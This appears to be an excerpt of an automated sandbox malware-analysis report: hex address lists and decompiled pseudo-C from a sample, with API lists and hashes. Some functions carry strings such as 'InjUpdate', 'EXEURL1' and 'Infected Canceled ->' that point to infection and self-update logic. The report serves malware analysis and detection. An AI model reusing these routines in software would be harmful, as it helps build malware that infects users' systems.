                                                                                                                                                                                                                            0x00497ff2
                                                                                                                                                                                                                            0x00497ff5
                                                                                                                                                                                                                            0x00497ffd
                                                                                                                                                                                                                            0x00498002
                                                                                                                                                                                                                            0x00498014
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004980fc
                                                                                                                                                                                                                            0x004980fe
                                                                                                                                                                                                                            0x004980ff
                                                                                                                                                                                                                            0x0049810e
                                                                                                                                                                                                                            0x00498111
                                                                                                                                                                                                                            0x00498115
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00498115
                                                                                                                                                                                                                            0x0049801c
                                                                                                                                                                                                                            0x00498021
                                                                                                                                                                                                                            0x0049802d
                                                                                                                                                                                                                            0x00498033
                                                                                                                                                                                                                            0x0049803a
                                                                                                                                                                                                                            0x00498040
                                                                                                                                                                                                                            0x00498040
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049803c
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x0049802f
                                                                                                                                                                                                                            0x00498044
                                                                                                                                                                                                                            0x00498045
                                                                                                                                                                                                                            0x0049804a
                                                                                                                                                                                                                            0x0049804d
                                                                                                                                                                                                                            0x00498053
                                                                                                                                                                                                                            0x00498060
                                                                                                                                                                                                                            0x00498065
                                                                                                                                                                                                                            0x004980c2
                                                                                                                                                                                                                            0x004980c7
                                                                                                                                                                                                                            0x004980cc
                                                                                                                                                                                                                            0x004980ce
                                                                                                                                                                                                                            0x004980d7
                                                                                                                                                                                                                            0x004980d7
                                                                                                                                                                                                                            0x00498067
                                                                                                                                                                                                                            0x00498072
                                                                                                                                                                                                                            0x0049807e
                                                                                                                                                                                                                            0x0049809a
                                                                                                                                                                                                                            0x0049809f
                                                                                                                                                                                                                            0x004980a4
                                                                                                                                                                                                                            0x004980a6
                                                                                                                                                                                                                            0x004980af
                                                                                                                                                                                                                            0x004980af
                                                                                                                                                                                                                            0x00498080
                                                                                                                                                                                                                            0x00498087
                                                                                                                                                                                                                            0x00498087
                                                                                                                                                                                                                            0x0049807e
                                                                                                                                                                                                                            0x004980de
                                                                                                                                                                                                                            0x004980e1
                                                                                                                                                                                                                            0x004980f2
                                                                                                                                                                                                                            0x004980f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004980f5
                                                                                                                                                                                                                            0x00497f97
                                                                                                                                                                                                                            0x00497e11
                                                                                                                                                                                                                            0x00497e27
                                                                                                                                                                                                                            0x00497e2f
                                                                                                                                                                                                                            0x00497e35
                                                                                                                                                                                                                            0x00497e42
                                                                                                                                                                                                                            0x00497e5b
                                                                                                                                                                                                                            0x00497e63
                                                                                                                                                                                                                            0x00497e69
                                                                                                                                                                                                                            0x00497e76
                                                                                                                                                                                                                            0x00497e8f
                                                                                                                                                                                                                            0x00497e97
                                                                                                                                                                                                                            0x00497e9d
                                                                                                                                                                                                                            0x00497eaa
                                                                                                                                                                                                                            0x00497ec3
                                                                                                                                                                                                                            0x00497ecb
                                                                                                                                                                                                                            0x00497ed1
                                                                                                                                                                                                                            0x00497ede
                                                                                                                                                                                                                            0x00497ef5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60,00000000,0049814B,?,?,?,?,00000000,00000000), ref: 00497D15
                                                                                                                                                                                                                              • Part of subcall function 00473490: ShellExecuteEx.SHELL32(0000003C), ref: 00473512
                                                                                                                                                                                                                              • Part of subcall function 00473490: WaitForSingleObject.KERNEL32(00000000,00000032,00000000,00473564), ref: 00473536
                                                                                                                                                                                                                              • Part of subcall function 0045A800: PostQuitMessage.USER32(00000000), ref: 0045A80B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExecuteMessageObjectPostQuitShellSingleSleepWait
                                                                                                                                                                                                                            • String ID: .exe$.ini$EXEURL1$InjUpdate$PORT$VER
                                                                                                                                                                                                                            • API String ID: 1631069871-204213252
                                                                                                                                                                                                                            • Opcode ID: f28c68a9cf740bc75c450aae053dd7dd02a563239b3f7edc268703e66f497ea7
                                                                                                                                                                                                                            • Instruction ID: 45283d241bb881e06991861ba9452227acefdf6b6ef9343d0a562746dac06cd8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f28c68a9cf740bc75c450aae053dd7dd02a563239b3f7edc268703e66f497ea7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BC15130604108DFDF10EB69D852A9E7BB5EB96304F61847BE500E7391DB38AD0ACB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v13;
                                                                                                                                                                                                                            				struct tagMENUITEMINFOA _v61;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				CHAR* _t109;
                                                                                                                                                                                                                            				char _t115;
                                                                                                                                                                                                                            				short _t149;
                                                                                                                                                                                                                            				void* _t154;
                                                                                                                                                                                                                            				intOrPtr _t161;
                                                                                                                                                                                                                            				intOrPtr _t184;
                                                                                                                                                                                                                            				struct HMENU__* _t186;
                                                                                                                                                                                                                            				int _t190;
                                                                                                                                                                                                                            				void* _t192;
                                                                                                                                                                                                                            				intOrPtr _t193;
                                                                                                                                                                                                                            				void* _t196;
                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t155 = __ecx;
                                                                                                                                                                                                                            				_v68 = 0;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v5 = __ecx;
                                                                                                                                                                                                                            				_t186 = __edx;
                                                                                                                                                                                                                            				_t154 = __eax;
                                                                                                                                                                                                                            				_push(_t196);
                                                                                                                                                                                                                            				_push(0x44abbb);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t196 + 0xffffffc0;
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x3e)) == 0) {
                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                            					_pop(_t161);
                                                                                                                                                                                                                            					 *[fs:eax] = _t161;
                                                                                                                                                                                                                            					_push(0x44abc2);
                                                                                                                                                                                                                            					E004049C0( &_v68);
                                                                                                                                                                                                                            					return E004049C0( &_v12);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                                                                                                                                                                                                            				if(E0044C8DC(_t154) <= 0) {
                                                                                                                                                                                                                            					__eflags =  *((short*)(_t154 + 0x60));
                                                                                                                                                                                                                            					if( *((short*)(_t154 + 0x60)) == 0) {
                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                            						if((GetVersion() & 0x000000ff) < 4) {
                                                                                                                                                                                                                            							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
                                                                                                                                                                                                                            							_t103 = E0044C8DC(_t154);
                                                                                                                                                                                                                            							__eflags = _t103;
                                                                                                                                                                                                                            							if(_t103 <= 0) {
                                                                                                                                                                                                                            								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
                                                                                                                                                                                                                            								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154), _t109);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L22;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v61.cbSize = 0x2c;
                                                                                                                                                                                                                            						_v61.fMask = 0x3f;
                                                                                                                                                                                                                            						_t192 = E0044CE98(_t154);
                                                                                                                                                                                                                            						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                            								_t115 = 0;
                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                                                                                                                                                                                                            							if(_t205 == 0) {
                                                                                                                                                                                                                            								goto L15;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							_t115 = 1;
                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                            							_v13 = _t115;
                                                                                                                                                                                                                            							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
                                                                                                                                                                                                                            							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
                                                                                                                                                                                                                            							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                                                                                                                                                                                                            							_v61.hSubMenu = 0;
                                                                                                                                                                                                                            							_v61.hbmpChecked = 0;
                                                                                                                                                                                                                            							_v61.hbmpUnchecked = 0;
                                                                                                                                                                                                                            							_v61.dwTypeData = E00404E80(_v12);
                                                                                                                                                                                                                            							if(E0044C8DC(_t154) > 0) {
                                                                                                                                                                                                                            								_v61.hSubMenu = E0044AE70(_t154);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                                                                                                                                                                                                            							goto L22;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                                                                                                                                                                                                            					__eflags = _t193;
                                                                                                                                                                                                                            					if(_t193 == 0) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_push(0x44abd4);
                                                                                                                                                                                                                            						E00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                                                                                                                                                                                                            						_push(_v68);
                                                                                                                                                                                                                            						E00404D40();
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t184 =  *0x449854; // 0x4498a0
                                                                                                                                                                                                                            					_t149 = E00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
                                                                                                                                                                                                                            					__eflags = _t149;
                                                                                                                                                                                                                            					if(_t149 != 0) {
                                                                                                                                                                                                                            						goto L8;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v61.hSubMenu = E0044AE70(_t154);
                                                                                                                                                                                                                            				goto L8;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                                                                                                                                                                                            • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                                                                                                                                                                                              • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$CreateInsertItemPopupVersion
                                                                                                                                                                                                                            • String ID: ,$?
                                                                                                                                                                                                                            • API String ID: 133695497-2308483597
                                                                                                                                                                                                                            • Opcode ID: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                                                                                                                                                                                            • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E004776D4(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                            				char _t96;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t107;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t109;
                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t113;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t132;
                                                                                                                                                                                                                            				intOrPtr _t156;
                                                                                                                                                                                                                            				intOrPtr _t180;
                                                                                                                                                                                                                            				intOrPtr _t191;
                                                                                                                                                                                                                            				intOrPtr _t205;
                                                                                                                                                                                                                            				intOrPtr _t206;
                                                                                                                                                                                                                            				intOrPtr _t210;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t203 = __esi;
                                                                                                                                                                                                                            				_t202 = __edi;
                                                                                                                                                                                                                            				_t205 = _t206;
                                                                                                                                                                                                                            				_t156 = 7;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t156 = _t156 - 1;
                                                                                                                                                                                                                            				} while (_t156 != 0);
                                                                                                                                                                                                                            				_push(_t156);
                                                                                                                                                                                                                            				_t1 =  &_v8;
                                                                                                                                                                                                                            				 *_t1 = _t156;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v16 =  *_t1;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				E00404E70(_v16);
                                                                                                                                                                                                                            				_push(_t205);
                                                                                                                                                                                                                            				_push(0x4778dd);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t206;
                                                                                                                                                                                                                            				if( *((intOrPtr*)( *_v8 + 0x14))() - 1 < 0) {
                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                            					_pop(_t180);
                                                                                                                                                                                                                            					 *[fs:eax] = _t180;
                                                                                                                                                                                                                            					_push(0x4778e4);
                                                                                                                                                                                                                            					E004049E4( &_v68, 0xb);
                                                                                                                                                                                                                            					return E004049E4( &_v16, 2);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t95 =  *((intOrPtr*)( *_v8 + 0x14))() - 1;
                                                                                                                                                                                                                            				if(_t95 < 0) {
                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t96 = _t95 + 1;
                                                                                                                                                                                                                            				_t210 = _t96;
                                                                                                                                                                                                                            				_v24 = _t96;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            					if(E00409A48(_v28, _t210) != 0) {
                                                                                                                                                                                                                            						 *[fs:eax] = _t206;
                                                                                                                                                                                                                            						_t146 =  *_v8;
                                                                                                                                                                                                                            						 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x47789f, _t205);
                                                                                                                                                                                                                            						 *0x49ec78 = LoadLibraryA(E00404E80(_v32));
                                                                                                                                                                                                                            						_t107 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            						if(E004770E4(_t107,  *_v8, _v16, _t202, _t203) != 0) {
                                                                                                                                                                                                                            							_t109 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            							E0047717C(_t109, _t146,  &_v48, _v16, _t202, _t203);
                                                                                                                                                                                                                            							_t112 = E00409628(_v48, _t205, __eflags);
                                                                                                                                                                                                                            							__eflags = _t112 - _a8;
                                                                                                                                                                                                                            							if(_t112 >= _a8) {
                                                                                                                                                                                                                            								_t113 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            								FreeLibrary(_t113);
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            								E00404CCC( &_v64, _v68, "Infected Canceled -> ");
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0x20))();
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            								E004774A8(_v52,  *_v8, _v12, _t202, _t203, 1);
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            								E00404CCC( &_v56, _v60, "Vrs Updated -> ");
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0x20))();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t132 =  *0x49ec78; // 0x0
                                                                                                                                                                                                                            							FreeLibrary(_t132);
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            							E004774A8(_v36,  *_v8, _v12, _t202, _t203, 0);
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0xc))();
                                                                                                                                                                                                                            							E00404CCC( &_v40, _v44, "Completed -> ");
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x20))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_pop(_t191);
                                                                                                                                                                                                                            						 *[fs:eax] = _t191;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v20 = _v20 + 1;
                                                                                                                                                                                                                            					_t75 =  &_v24;
                                                                                                                                                                                                                            					 *_t75 = _v24 - 1;
                                                                                                                                                                                                                            				} while ( *_t75 != 0);
                                                                                                                                                                                                                            				goto L13;
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477780
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 004777A1
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477864
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Free$Load
                                                                                                                                                                                                                            • String ID: Completed -> $Infected Canceled -> $Vrs Updated ->
                                                                                                                                                                                                                            • API String ID: 2391024519-3592865843
                                                                                                                                                                                                                            • Opcode ID: e5ca2df3611e2abfeeb87632b8b91ed25a998eaf615441498497ba08c9cca89b
                                                                                                                                                                                                                            • Instruction ID: 17185f43945d3bc0c2e5cc5bb4bd267fdef97e65ffff577caacc568d39ef9c26
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5ca2df3611e2abfeeb87632b8b91ed25a998eaf615441498497ba08c9cca89b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32611878A04209DFDB04EFA5C8849EEB7B5FF48300F6180A6E904A7351CB34AE05CF65
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				void _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                                                                                            				intOrPtr _t91;
                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                                                                            				intOrPtr _t145;
                                                                                                                                                                                                                            				void* _t148;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				_t119 = __ecx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_t145 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            				 *((char*)(_v8 + 0x210)) = 1;
                                                                                                                                                                                                                            				_push(_t148);
                                                                                                                                                                                                                            				_push(0x442da9);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t148 + 0xffffffe0;
                                                                                                                                                                                                                            				E0043AFAC(_v8, __ecx, __ecx, _t145);
                                                                                                                                                                                                                            				_v16 = _v16 + 4;
                                                                                                                                                                                                                            				E0043C1D4(_v8,  &_v28);
                                                                                                                                                                                                                            				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
                                                                                                                                                                                                                            					_v24 = E00458218() -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(E00458224() <  *(_v8 + 0x48) + _v28) {
                                                                                                                                                                                                                            					_v28 = E00458224() -  *(_v8 + 0x48);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(E0045820C() > _v28) {
                                                                                                                                                                                                                            					_v28 = E0045820C();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(E00458200() > _v16) {
                                                                                                                                                                                                                            					_v16 = E00458200();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                                                                                                                                                                                                            				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
                                                                                                                                                                                                                            					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                            						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                                                                                                                                                                                                            						if(_v12 == 0) {
                                                                                                                                                                                                                            							E00445E24( &_v36);
                                                                                                                                                                                                                            							if(_v32 <= _v24) {
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *0x49bc1c(E00441704(_v8), 0x64,  *0x0049BD24 | 0x00040000);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t80 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            				E0043EE38(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
                                                                                                                                                                                                                            				ShowWindow(E00441704(_v8), 4);
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0x7c))();
                                                                                                                                                                                                                            				_pop(_t136);
                                                                                                                                                                                                                            				 *[fs:eax] = _t136;
                                                                                                                                                                                                                            				_push(0x442db0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                                                                                                                                                                                                            				_t91 = _v8;
                                                                                                                                                                                                                            				 *((char*)(_t91 + 0x210)) = 0;
                                                                                                                                                                                                                            				return _t91;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00442CBA
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
                                                                                                                                                                                                                            • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00442D53
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
                                                                                                                                                                                                                              • Part of subcall function 00445E24: GetCursorPos.USER32(?), ref: 00445E28
                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00442D90
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3024527889-0
